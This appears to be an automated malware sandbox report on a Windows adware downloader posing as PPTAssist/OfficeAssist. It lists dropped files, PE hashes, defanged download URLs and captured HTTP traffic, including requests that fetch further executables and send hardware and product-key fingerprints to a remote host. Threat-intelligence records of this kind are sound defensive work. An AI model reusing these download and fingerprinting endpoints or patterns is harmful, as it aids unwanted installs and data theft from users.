%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\meihua.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pptassist\~21d476\meihua2013.ppsx (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn46.tmp\v6svc_oem.dll (5135 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\oem.ini (1263 bytes)
%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542\OfficeAssist.0419.80.1123.exe (128768 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.eyuyan.com)Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 525730 | 528384 | 5.16694 | 9669be3168afdeaa40ea92d045a9bf87 |
.rdata | 532480 | 78292 | 81920 | 3.10013 | 59a4df56cb6817d94f6644cd1766027b |
.data | 614400 | 137384 | 73728 | 4.23409 | 638d29c6b937c71b888b0b82efddfb46 |
.rsrc | 753664 | 22336 | 24576 | 3.3136 | c674065dbbb8d9d754a7080269a63dd4 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.ancheke.cn/ffdy_238_63518.exe | |
hxxp://na.b9.aicdn.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 | |
hxxp://t.cn/RzuoiTP | 180.149.135.224 |
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php | 180.149.136.250 |
hxxp://show.man1234.com/mmliao/MM-liao8398.exe | 122.227.42.227 |
hxxp://idc.lssen.net/yx_dts.exe | |
hxxp://opt.xdwscache.glb0.lxdns.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83 | |
hxxp://opt.xdwscache.glb0.lxdns.com/temp/downloaderico/main.ico | |
hxxp://idc.lssen.net/OfficeAssist.0419.80.1123.exe | |
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://newgameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1 | |
hxxp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 | 113.107.101.168 |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1.css?t=1419052484 | |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/main.jpg | |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/log.jpg | |
hxxp://c02.i05.arnic.hadns.net/yx/dts/sqft/905848/app.ini | |
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://opt.xdwscache.glb0.lxdns.com/Downloaderconfig.aspx?imgtype=9158 | |
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | |
hxxp://1st.dl.glb0.lxdns.com/ktv/9158chat2_ktv083_98200205.exe | |
hxxp://tj.9158.com/temp/downloaderico/main.ico | 203.130.60.32 |
hxxp://idc.xn--r93a55o.cc/yx_dts.exe | 222.186.60.69 |
hxxp://img1.37wanimg.com/dts/css/client/game1/main.jpg | 203.130.61.92 |
hxxp://www.hanyueyr.com/ffdy_238_63518.exe | 42.121.253.211 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 203.130.60.32 |
hxxp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1 | 121.201.12.94 |
hxxp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 | 108.186.7.130 |
hxxp://idc.xn--r93a55o.cc/OfficeAssist.0419.80.1123.exe | 222.186.60.69 |
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83 | 203.130.60.32 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 203.130.60.32 |
hxxp://d.wanyouxi7.com/yx/dts/sqft/905848/app.ini | 61.156.157.181 |
hxxp://img1.37wanimg.com/dts/css/client/game1/log.jpg | 203.130.61.92 |
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 | 203.130.60.32 |
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined¶m=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | 112.90.83.106 |
hxxp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484 | 203.130.61.92 |
down.cncpa.net | 222.186.129.20 |
jh.01lm.com | 171.107.186.80 |
pchome.b0.upaiyun.com | 108.186.7.129 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Opendownloadernewxml.aspx?softlist=&lmarkid=83 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Title>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>http://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>http://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...<Setuptime>20</Setuptime>...<ToolIcon>9158........</ToolIcon>...<Item>9158ktv</Item>...<Mtype>19</Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>..</config>......
<<< skipped >>>
GET /temp/downloaderico/main.ico HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:39 GMT
Cache-Control: No-cache
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:61cd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 zjjhdx33:8106 (Cdn Cache Server V2.0), 1.1 td48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
..N....................................n..qR..qL..._...q...~...........................h..V...W....p...............................w...j..oP..oI...e...{..............................v?..h/..p:...................................z...d..aB..kD...b.......................................w.......................................|...a..\>..qQ...N...............................................................................w..nF..`D..o\.%qE...F...i...q...o...o...p...t...v...w...v...w...z...{...z...x...x...y...v...k...N..c=..mY.I....o\.0nG..m8..h/..i1..j1..r8..x=..w>..v=..q9..q;..yB..yB..xC..l:..k9..j9..r@..j=..hE..nY.L....................................................................................................(... ...@..... .................................o].Ixa...d..wW..pM..qM..qL..pK..yT...a...a...`..._...Y..oC..oC..oB..pC...\...\...\...[...Z..uJ..i=..g?..iJ..o[.sUG..........p^.f.f...p...w...v..}]..|Z..|X..|W..~X...t...t...r...q...l..zL..zL..zK...P...m...l...l...k...i..xH..rC..k>..c7..`8..lV..OB..m[.,~f...v...............}...g...f...e...c...|...............}...Y...X...V...d...|...|...{...{...i...Q..{N..uI..mA..e9..lF..p].gu`...o.......................z...p............ .h...F......... ......... .... .....6...00.... ..%......(....... ..... .........................p^...g...j..vT..vR...`...j...e..uH..vH...d...c...U..k?..eA..lU.*.g...........}...j...q...........]...c...........]..|P..qF..nL...d...............{...t...........m...u.......e...v...}......tK..z^...z...............}......D....h...p...d..xF...
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:45 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:51 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>....
<<< skipped >>>
GET /dts/css/client/game1/log.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:31:26 GMT
Date: Wed, 10 Dec 2014 03:31:26 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 50696
Last-Modified: Wed, 23 Apr 2014 06:14:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8104 (Cdn Cache Server V2.0), 1.1 kf48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
......JFIF.....H.H.....C....................................................................C.........................................................................t.............................................K...........................!.."1.2A.#BQa...q$3Rb...%&r...'5C..(47E.....DG..................................W..........................!.1."2AQ..BRaq..#.....$3b....CSTV..%r....4c.....&5Det..................?....4{=n.w%.`..h.....,.]e...szie.R=X..I.......F.D.MO.1C.O.;.-........:y..rjR...t@...nc..u..r$FM..2.zD_).V......v........j".a.W.D..W...}..K.n..[5.]T.H....9..?..z.b..V.=4......h..p..!......8......MO..&T.".F.m^...T..L..D..}^..H.3../.(*......#y.....<f......y(.q.=..T*.v.. ."......a.y!...R.8M........:..`... .O..H.O..[......H.".O,.@.IfI&\.S...\a.!S..^-..)Zm....*E.{.a2../Sn.eP.^.8CJ..[.~......@<..&.yi.....Nx....@.9W<T.G..I.&W.=....rr.E7....i.........vM.....2H.....^.}Ys..=....3n_...8.'..$...M......]~.Drj";.b.........}....9.............U.K.p....N.....-1..S.......:.E|.>Y.1.ME:2.,.V.Q?........Kx"]F.y]....O....g..5>K.8.......NF..T....pn...........Vx..mE..D.05C..l(..?..8..D..f...9/rU...pT.......<H.O........x.Ec.=..:..h.......Sn..... O.,..%4V.u.}.....h.~.....X..<....X..(....h.T....<N..&..=.cc.)...........WL.....fW..8e.a.h.~.O,....O8..&.A.S.........._....n.\Tz.=.m:4.v...w}VQ.....SZ......I`....~.....Sh)%..b.H.i..Q....9t.......-v.......J-#4..[6..!.=;e.fy7p.P.7..z....!{..;.........<.m.....C6....d.y.6.Mi...z._...'....:}c..O.K$.vj.\...f.......I....i g~.d.G4..(..L..3...i..D.j...(......3..m..2=..
<<< skipped >>>
GET /fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 HTTP/1.1
Referer: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jafaye.ynhaoya.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.5
Date: Sat, 20 Dec 2014 05:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 108632
Connection: keep-alive
X-Request-Id: 8879884559421a09a3cbc32ffd33f322; 320f88ff09ff646b1525c149da6c721c; 95be69e69653739102feb611ad7193c3; 3a87dfe84c736c89a24068822ded4f09
X-Source: U/200
Last-Modified: Sat, 20 Dec 2014 04:47:14 GMT
Expires: Sat, 27 Dec 2014 06:31:18 GMT
Cache-Control: max-age=611038
Accept-Ranges: bytes
Age: 1589
X-Cache: MISS|HIT from ctn-zj-hgh-098; MISS|HIT from ctn-gd-zhs-006; HIT from usn-us-vcv-130
Content-Disposition: attachment; filename=1419052427l238l63518.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@.................................5\.......................................s.......`.. I..............H............................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata... ...@...........................rsrc... I...`...J...t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /dts/css/client/game1.css?t=1419052484 HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:46 GMT
Server: nginx/1.4.2
Content-Type: text/css
Content-Length: 8315
Last-Modified: Sat, 13 Dec 2014 06:42:52 GMT
ETag: "548bdfec-207b"
Expires: Mon, 19 Jan 2015 05:14:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
X-Via: 1.1 zjjhdx32:8106 (Cdn Cache Server V2.0), 1.1 kf49:4 (Cdn Cache Server V2.0)
Connection: keep-alive
idth:606px;height:395px;overflow:hidden;color:#66554b;background:#000;}...log {background:url(game1/main.jpg) no-repeat;}...reg {background:url(game1/main.jpg) no-repeat;}...server {background:url(game1/server.jpg) no-repeat;}...history {background:url(game1/history.jpg) no-repeat;}../* log */../* kv */...kv-focus {width:221px;height:131px;overflow:hidden;position:absolute;top:4px;right:7px;}...log-kv {position:relative;width:221px;height:131px;overflow:hidden;}...log-kv img {vertical-align:bottom;width:221px;height:131px;}...log-kv-nav {position:absolute;bottom:2px;right:5px;}...log-kv-nav a {float:left;display:block;background-color:#fff;color:#000;padding:2px 8px;margin-right:5px;_display:inline;text-indent:-9999px;font-size: 0;}...log-kv-nav .focus, .log-kv-nav a:hover {background-color:#fd8800;color:#fff;text-decoration:none;}../* news */...news-tab {display:none;}...news {width:350px;height:135px;overflow:hidden;position:absolute;top:34px;left:10px;}...news li {padding:0 10px 0 16px;height:23px;border-bottom:0;line-height:24px;background:url(game1/dot.jpg) no-repeat left center;}...news li a {displ@charset "utf-8";..html, body, div, span, iframe,h1, h2, p, blockquote, pre,abbr, em, img, samp,small, strong, sub,b, i,dl, dt, dd, ul, li,..fieldset, form, label, legend,table, caption, tbody, tfoot, thead, tr, th, td,article, aside, canvas, details, figcaption, ..figure, footer, header,hgroup, menu, nav, section, summary {margin:0;padding:0;border:0;outline:0;}..a, input, button {padding:0;margin:0;outline:0;b
<<< skipped >>>
GET /dts/css/client/game1/main.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3®times=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:30:47 GMT
Date: Wed, 10 Dec 2014 03:30:47 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 52706
Last-Modified: Thu, 05 Jun 2014 07:17:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8107 (Cdn Cache Server V2.0), 1.1 kf50:8 (Cdn Cache Server V2.0)
Connection: keep-alive
......JFIF.....H.H.....C....................................................................C.........................................................................^............................................f.........................!1.."AQ.2aq..#B.3R......$b....LTr...DS......&56cds......7.....'EFtUVf.....................................F........................!.1A.."Qa.2q.......BR...#3b.....%DSTcdr.................?..Tl}..&..f....eV[.6xTe..m.@}Z......),..gJ.P.[;P.{..4.....v.OIr....S...%.SRi...V......j...&.!D..`n.T_....#.8.7n[.k..-3..Z.?.Wn..Rl.E2..Z.g....u.M^.n............Pb.H..>...].O..&....JVyr..)...w......dv..r.`.u.......k^vzt.......;....2.......= 4'l;J.J*]j......9..[8....mkP.........Al...@R... oO......wg^..@l..^...?.......S..5i....ma. *....*...?.g.R.s..i..F..U.........0v...p...L..*...]. .3.-..8nP.._.Wo=.....T....wM...{..WvY...h...n...D.}...&H%.........fM4..7..v.umE......7k..$..f.....oY....gkL.]..\.T.d...w.wt.\1.X.zsxsL.{S.{[.~_5.M.F...i..z]w..l........8.V....Y..Y..X..c....m...E.M0=.y. ..yG...x.WL.0.V.?...-.....F.....6D.#c..^.S.m..Y...y.H..*c ....c.w....#..%..u^.%....m...\.U.D..>..>.-X.....MB.....o. ..._..........&......v..}.yX.&........l}.I.%O.x....*m..f...y8..&.0X...c....&R....v...)......y:T......?.vs.].\=.~....rZo........]..6.^.m......>.].eI...q...bl.*......./.7.j.Z..=z.....4S..X....%.?.h./...w.fW..^.l.... .].o..*.d.>g.4...kYA.P-.<P....Z...zi..;Uk.<........L.z..Woe...3.M~....b...[..{.T...f.Vd.E..L.>d..PM....MK..bQ1......t.?......?n..../..y~Y.\......o}..X=...............q...
<<< skipped >>>
GET /yx_dts.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 915216
Content-Type: application/octet-stream
Last-Modified: Thu, 18 Dec 2014 08:27:47 GMT
Accept-Ranges: bytes
ETag: "2c1fe2809c1ad01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:36 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@.................................q@.......................................s.......@..HW..............H............................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...HW...@...X...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /OfficeAssist.0419.80.1123.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 3696856
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Dec 2014 12:34:18 GMT
Accept-Ranges: bytes
ETag: "22d7c1b881bd01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:41 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...................................9......................................t.......... 0..........pO8.h............................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc... 0.......2...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /RzuoiTP HTTP/1.1
